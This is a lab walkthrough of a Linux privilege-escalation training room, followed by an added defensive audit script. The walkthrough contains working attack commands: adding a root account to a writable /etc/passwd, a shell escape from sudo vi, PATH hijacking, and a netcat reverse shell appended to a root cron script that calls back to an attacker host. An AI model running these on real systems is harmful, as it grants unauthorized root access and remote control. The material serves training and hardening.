Common Linux Privesc
Room Link: https://tryhackme.com/room/commonlinuxprivesc
Enumeration
Download LinEnum Script
Kali
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Log in to host
Kali
ssh user3@$VICTIM
Password: password
The target's hostname

There are 8 users

4 shells


Some users can write to passwd file

Abusing SUID/GUID Files
Victim
find / -perm -u=s -type f 2>/dev/null
Running the shell script in user3's home directory gives us root access right away.
Victim
/home/user3/shell
Exploiting Writeable /etc/passwd
Victim
su user7
Password: password
Victim
openssl passwd -1 -salt new 123
echo 'new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' >> /etc/passwd
cat /etc/passwd
su new
Password: 123
Escaping Vi Editor
Victim
su user8
Password: password
Victim
sudo -l
Victim
sudo vi
:!sh
whoami
Exploiting Crontab
Victim
ssh user4@$VICTIM
Password: password
Kali
msfvenom -p cmd/unix/reverse_netcat lhost=$KALI lport=8888 R
Kali
nc -lvnp 8888
Victim
cat /etc/crontab 
Add the payload we generated on Kali to the script.
Victim
echo 'mkfifo /tmp/cibykaz; nc 10.10.185.2 8888 0</tmp/cibykaz | /bin/sh >/tmp/cibykaz 2>&1; rm /tmp/cibykaz' >> /home/user4/Desktop/autoscript.sh
Wait for the script to run and catch the shell on Kali.

Exploiting PATH Variable
Victim
su user5
Password: password
The script in user5's home directory just runs the ls command.
Victim
cd /home/user5
./script
We now create a script called ls that gives us a bash shell.
Victim
cd /tmp
echo "/bin/bash" > ls
chmod +x ls
Before we change the path, we can see that ls resolves to /bin/ls.

After running the command below, ls resolves to our script.
Victim
export PATH=/tmp:$PATH
Now the script in user5's directory behaves differently, and we have a root shell.
Victim
cd /home/user5
./script
Run the following to reset the path variable.
Victim
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$PATH
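
Hardening check for the writable /etc/passwd, crontab and PATH sections above, as an added example that is not part of the original walkthrough or the room. The function names and the audit.sh filename are assumptions, and the crontab parsing assumes the system crontab layout with the user in the sixth field.

```sh
#!/bin/sh
# Added example, not from the room: audit helpers for the writable
# /etc/passwd, root cron script and PATH issues shown in this walkthrough.

# True if the path is not owned by UID 0 or is group- or other-writable.
loose_perms() {
    [ -n "$(find -H "$1" -prune \( ! -user 0 -o -perm -0020 -o -perm -0002 \) \
        -print 2>/dev/null)" ]
}

# Accounts in a passwd-format file that have UID 0 without being root, or
# that keep a password hash in field 2 instead of the "x" placeholder.
suspect_accounts() {
    awk -F: '($3 == 0 && $1 != "root") || $2 ~ /^\$/ { print $1 }' "$1"
}

# Absolute paths run as root from a system crontab (user in field 6)
# whose file has loose permissions.
risky_root_cron() {
    awk '$1 !~ /^#/ && $6 == "root" {
        for (i = 7; i <= NF; i++) if ($i ~ /^\//) print $i
    }' "$1" | sort -u | while read -r target; do
        if loose_perms "$target"; then printf '%s\n' "$target"; fi
    done
}

# World-writable directories in a PATH string (sticky ones such as /tmp
# are still reported).
writable_path_dirs() {
    printf '%s\n' "$1" | tr ':' '\n' | while read -r dir; do
        if [ -d "$dir" ] &&
           [ -n "$(find -H "$dir" -prune -perm -0002 -print 2>/dev/null)" ]; then
            printf '%s\n' "$dir"
        fi
    done
}

# Run every check against the live host: sh audit.sh audit
# (audit.sh is a hypothetical filename for this block).
audit_host() {
    if loose_perms /etc/passwd; then echo "/etc/passwd: loose permissions"; fi
    suspect_accounts /etc/passwd | sed 's/^/suspect account: /'
    if [ -r /etc/crontab ]; then
        risky_root_cron /etc/crontab | sed 's/^/root cron target: /'
    fi
    writable_path_dirs "$PATH" | sed 's/^/writable PATH dir: /'
}
if [ "${1:-}" = "audit" ]; then audit_host; fi
```

Any output line points at one of the conditions used above; a clean host prints nothing.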